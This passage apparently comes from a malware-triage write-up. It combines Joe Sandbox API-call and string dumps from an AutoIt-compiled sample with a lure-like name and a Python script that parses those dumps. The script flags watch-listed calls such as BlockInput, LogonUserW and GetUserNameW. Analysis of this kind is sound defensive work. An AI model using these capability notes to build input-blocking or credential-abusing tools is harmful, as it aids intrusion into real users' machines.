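• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A48F97,?,?,?,00000001), ref: 00A4A39A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A4A3A3
APIs
• __time64.LIBCMT ref: 00A88B25
  • Part of subcall function 00A4543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A891F8,00000000,?,?,?,?,00A893A9,00000000,?), ref: 00A45443
  • Part of subcall function 00A4543A: __aulldiv.LIBCMT ref: 00A45463
APIs
• BlockInput.USER32(00000001), ref: 00A94218
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A84F18
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A788D1), ref: 00A78CB3
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00A62242
"""

# One API line: optional 'Part of subcall function XXXX:' prefix, Name.MODULE,
# an optional parenthesised argument list, optional comma, then 'ref: VA'.
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Editor's watch list (assumption: what to open first, not a maliciousness verdict).
WATCHLIST: Dict[str, str] = {
    "BlockInput": "blocks keyboard and mouse input while TRUE",
    "mouse_event": "synthesises mouse input",
    "AdjustTokenPrivileges": "enables or disables privileges in an access token",
    "LogonUserW": "logs a user on with supplied credentials and returns a token",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter (also normal CRT start-up)",
    "GetUserNameW": "user enumeration",
}

# Low mouse_event dwFlags bits (winuser.h).
MOUSEEVENTF = {
    0x0001: "MOUSEEVENTF_MOVE",
    0x0002: "MOUSEEVENTF_LEFTDOWN",
    0x0004: "MOUSEEVENTF_LEFTUP",
    0x0008: "MOUSEEVENTF_RIGHTDOWN",
    0x0010: "MOUSEEVENTF_RIGHTUP",
}


def parse_api_calls(text: str) -> List[dict]:
    """Return one dict per API line; non-matching lines (headers) are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": "Part of subcall function" in line,
        })
    return calls


def to_rva(va: int, base: int = IMAGE_BASE) -> int:
    """Rebase a dump virtual address to an image-relative offset."""
    return va - base


def decode_first_arg(call: dict) -> Optional[str]:
    """Decode the first argument only where its meaning is unambiguous.
    '?' marks a value the sandbox could not resolve, so it decodes to None."""
    if not call["args"] or call["args"][0] == "?":
        return None
    value = int(call["args"][0], 16)
    if call["api"] == "BlockInput":
        return "fBlockIt=TRUE (input blocked)" if value else "fBlockIt=FALSE (input released)"
    if call["api"] == "mouse_event":
        names = [name for bit, name in MOUSEEVENTF.items() if value & bit]
        return "dwFlags=" + ("|".join(names) if names else hex(value))
    return None


def flag_calls(calls: List[dict]) -> List[dict]:
    """Keep only watch-listed calls, with RVA, note and decoded argument."""
    return [
        {"api": c["api"], "rva": to_rva(c["ref"]),
         "note": WATCHLIST[c["api"]], "detail": decode_first_arg(c)}
        for c in calls if c["api"] in WATCHLIST
    ]


if __name__ == "__main__":
    for f in flag_calls(parse_api_calls(SAMPLE_REPORT)):
        print(f"{f['api']:28s} rva=0x{f['rva']:06X}  {f['detail'] or '-':32s} # {f['note']}")
```

The RVA is what to search for when the dump is loaded in IDA or Ghidra at a different base, since the `ref` values here are tied to the 0x00A20000 mapping of this particular run.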
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ef708563ec82045b0efe5a73fe7cfbd38a456da886bbb9b4243e8f29a7be306
                                                        • Instruction ID: 79aa017de3ca7e553a20aa772698a769b52a0efb362b02585e44ed42ca238ec3
                                                        • Opcode Fuzzy Hash: 9ef708563ec82045b0efe5a73fe7cfbd38a456da886bbb9b4243e8f29a7be306
                                                        • Instruction Fuzzy Hash: 7422E630A057168BDF288F64C89467DB7B1FB01344F68C46AF44A8B691EB7C9D82DB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: ded012d215a079753d9343d0eda1ed043823c9471357a5c7c721ca5ffd8aed10
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 3EC1813A20509349EB2D4739943423EBAE16BE27B139A075EF4B2CB5C4FF20D569D720
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 8a885dbf6104c3f496ceb57f4a5943b4f9c881810611618be1226b25af6e9783
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: 09C1A43A20519349EB2D4739843413EBBE16BD27B139A076EF4B2CB4C5FF20D5699720
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 201d4154fbd423f2baa97fd6ab3615733bc285951cdfdf6efd87073110200862
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 8DC1A43A24515349EF2D4739847403EBBE16BE27B135A075EE4B2CB4C4FF10D5AAD610
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00AAA89F
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AAA8D0
                                                        • GetSysColor.USER32(0000000F), ref: 00AAA8DC
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00AAA8F6
                                                        • SelectObject.GDI32(?,?), ref: 00AAA905
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AAA930
                                                        • GetSysColor.USER32(00000010), ref: 00AAA938
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00AAA93F
                                                        • FrameRect.USER32(?,?,00000000), ref: 00AAA94E
                                                        • DeleteObject.GDI32(00000000), ref: 00AAA955
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00AAA9A0
                                                        • FillRect.USER32(?,?,?), ref: 00AAA9D2
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAA9FD
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(00000012), ref: 00AAAB99
                                                          • Part of subcall function 00AAAB60: SetTextColor.GDI32(?,?), ref: 00AAAB9D
                                                          • Part of subcall function 00AAAB60: GetSysColorBrush.USER32(0000000F), ref: 00AAABB3
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(0000000F), ref: 00AAABBE
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(00000011), ref: 00AAABDB
                                                          • Part of subcall function 00AAAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AAABE9
                                                          • Part of subcall function 00AAAB60: SelectObject.GDI32(?,00000000), ref: 00AAABFA
                                                          • Part of subcall function 00AAAB60: SetBkColor.GDI32(?,00000000), ref: 00AAAC03
                                                          • Part of subcall function 00AAAB60: SelectObject.GDI32(?,?), ref: 00AAAC10
                                                          • Part of subcall function 00AAAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00AAAC2F
                                                          • Part of subcall function 00AAAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AAAC46
                                                          • Part of subcall function 00AAAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00AAAC5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID: @U=u
                                                        • API String ID: 4124339563-2594219639
                                                        • Opcode ID: c817b5917cce47a9bd24c64c5f467a64a486ed099b7a50d78578d3e9840f079c
                                                        • Instruction ID: f6bba933613e329dec8ee56a30a41a3da01c4a7394956cd8091122db8082bf70
                                                        • Opcode Fuzzy Hash: c817b5917cce47a9bd24c64c5f467a64a486ed099b7a50d78578d3e9840f079c
                                                        • Instruction Fuzzy Hash: 88A18072408302AFD715DFA4DC08A6B7BE9FF8A321F104B29F962961E0D735D946CB52
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,00AAF910), ref: 00AA38AF
                                                        • IsWindowVisible.USER32(?), ref: 00AA38D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-3469695742
                                                        • Opcode ID: e986339b108aa6332bbe3829d97a20e031ea151163e44850a1b0bcd7a1326566
                                                        • Instruction ID: 6cc6e1f9ac64c4f3d1131ad3cd50606768580d35edfd04b30756227cf8165843
                                                        • Opcode Fuzzy Hash: e986339b108aa6332bbe3829d97a20e031ea151163e44850a1b0bcd7a1326566
                                                        • Instruction Fuzzy Hash: 82D19E35204315DFCF14EF14CA51E6AB7A2AF95754F10886DB8865B3E2CB31EE0ACB91
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 00A22CA2
                                                        • DeleteObject.GDI32(00000000), ref: 00A22CE8
                                                        • DeleteObject.GDI32(00000000), ref: 00A22CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00A22CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00A22D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A5C68B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A5C6C4
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A5CAED
                                                          • Part of subcall function 00A21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A22036,?,00000000,?,?,?,?,00A216CB,00000000,?), ref: 00A21B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 00A5CB2A
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A5CB41
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A5CB57
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A5CB62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0$@U=u
                                                        • API String ID: 464785882-975001249
                                                        • Opcode ID: 22318e0ae65c6aabbf7b9bcba91b827d5470117cbc6ab060a0deb6e940e33db7
                                                        • Instruction ID: 5dd390fbde5ce29ec07c33188f6ce90512071db17af957d6c9977e0745b093a4
                                                        • Opcode Fuzzy Hash: 22318e0ae65c6aabbf7b9bcba91b827d5470117cbc6ab060a0deb6e940e33db7
                                                        • Instruction Fuzzy Hash: 4E12BD30604212EFCB24CF28D984BA9BBE1BF09321F544579F985DB666C731EC46CB91
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00A977F1
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A978B0
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A978EE
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A97900
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A97946
                                                        • GetClientRect.USER32(00000000,?), ref: 00A97952
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A97996
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A979A5
                                                        • GetStockObject.GDI32(00000011), ref: 00A979B5
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A979B9
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A979C9
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A979D2
                                                        • DeleteDC.GDI32(00000000), ref: 00A979DB
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A97A07
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A97A1E
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A97A59
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A97A6D
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A97A7E
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A97AAE
                                                        • GetStockObject.GDI32(00000011), ref: 00A97AB9
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A97AC4
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A97ACE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-2771358697
                                                        • Opcode ID: f1687cddd5dfae84930962f7a60533a1717628b355a5490b2a0da422320f28ec
                                                        • Instruction ID: 76519cce645a27fed47a2fdbc0608e3fa5c7329d595354753a9775267113c368
                                                        • Opcode Fuzzy Hash: f1687cddd5dfae84930962f7a60533a1717628b355a5490b2a0da422320f28ec
                                                        • Instruction Fuzzy Hash: 93A15F71A40215BFEB14DBE8DD4AFAE7BB9EB49710F008514FA15AB2E0D770AD01CB64
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00AAAB99
                                                        • SetTextColor.GDI32(?,?), ref: 00AAAB9D
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AAABB3
                                                        • GetSysColor.USER32(0000000F), ref: 00AAABBE
                                                        • CreateSolidBrush.GDI32(?), ref: 00AAABC3
                                                        • GetSysColor.USER32(00000011), ref: 00AAABDB
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AAABE9
                                                        • SelectObject.GDI32(?,00000000), ref: 00AAABFA
                                                        • SetBkColor.GDI32(?,00000000), ref: 00AAAC03
                                                        • SelectObject.GDI32(?,?), ref: 00AAAC10
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AAAC2F
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AAAC46
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AAAC5B
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AAACA7
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AAACCE
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00AAACEC
                                                        • DrawFocusRect.USER32(?,?), ref: 00AAACF7
                                                        • GetSysColor.USER32(00000011), ref: 00AAAD05
                                                        • SetTextColor.GDI32(?,00000000), ref: 00AAAD0D
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AAAD21
                                                        • SelectObject.GDI32(?,00AAA869), ref: 00AAAD38
                                                        • DeleteObject.GDI32(?), ref: 00AAAD43
                                                        • SelectObject.GDI32(?,?), ref: 00AAAD49
                                                        • DeleteObject.GDI32(?), ref: 00AAAD4E
                                                        • SetTextColor.GDI32(?,?), ref: 00AAAD54
                                                        • SetBkColor.GDI32(?,?), ref: 00AAAD5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID: @U=u
                                                        • API String ID: 1996641542-2594219639
                                                        • Opcode ID: 61d0bb164bf414e7c72fe550f15be63ab4f8f4aff491f029c35a2a39f3a33718
                                                        • Instruction ID: 1d38859f572933a1476887dd8d96209b09120eca8a9de7219532579d7e2201cb
                                                        • Opcode Fuzzy Hash: 61d0bb164bf414e7c72fe550f15be63ab4f8f4aff491f029c35a2a39f3a33718
                                                        • Instruction Fuzzy Hash: 1E616D71900219EFDB15DFE4DC48EAE7BB9EB0A320F108225FA15AB2E1D7719D41DB90
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8AF89
                                                        • GetDriveTypeW.KERNEL32(?,00AAFAC0,?,\\.\,00AAF910), ref: 00A8B066
                                                        • SetErrorMode.KERNEL32(00000000,00AAFAC0,?,\\.\,00AAF910), ref: 00A8B1C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AA8D34
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA8D45
• CharNextW.USER32(0000014E), ref: 00AA8D74
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AA8DB5
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AA8DCB
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA8DDC
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AA8DF9
• SetWindowTextW.USER32(?,0000014E), ref: 00AA8E45
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AA8E5B
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA8E8C
• _memset.LIBCMT ref: 00AA8EB1
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AA8EFA
• _memset.LIBCMT ref: 00AA8F59
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AA8F83
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00AA8FDB
• SendMessageW.USER32(?,0000133D,?,?), ref: 00AA9088
• InvalidateRect.USER32(?,00000000,00000001), ref: 00AA90AA
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AA90F4
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AA9121
• DrawMenuBar.USER32(?), ref: 00AA9130
• SetWindowTextW.USER32(?,0000014E), ref: 00AA9158
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0$@U=u
• API String ID: 1073566785-975001249
APIs
• GetCursorPos.USER32(?), ref: 00AA4C51
• GetDesktopWindow.USER32 ref: 00AA4C66
• GetWindowRect.USER32(00000000), ref: 00AA4C6D
• GetWindowLongW.USER32(?,000000F0), ref: 00AA4CCF
• DestroyWindow.USER32(?), ref: 00AA4CFB
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AA4D24
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA4D42
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AA4D68
• SendMessageW.USER32(?,00000421,?,?), ref: 00AA4D7D
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AA4D90
• IsWindowVisible.USER32(?), ref: 00AA4DB0
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AA4DCB
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AA4DDF
• GetWindowRect.USER32(?,?), ref: 00AA4DF7
• MonitorFromPoint.USER32(?,?,00000002), ref: 00AA4E1D
• GetMonitorInfoW.USER32(00000000,?), ref: 00AA4E37
• CopyRect.USER32(?,?), ref: 00AA4E4E
• SendMessageW.USER32(?,00000412,00000000), ref: 00AA4EB9
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A846E8
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A8470E
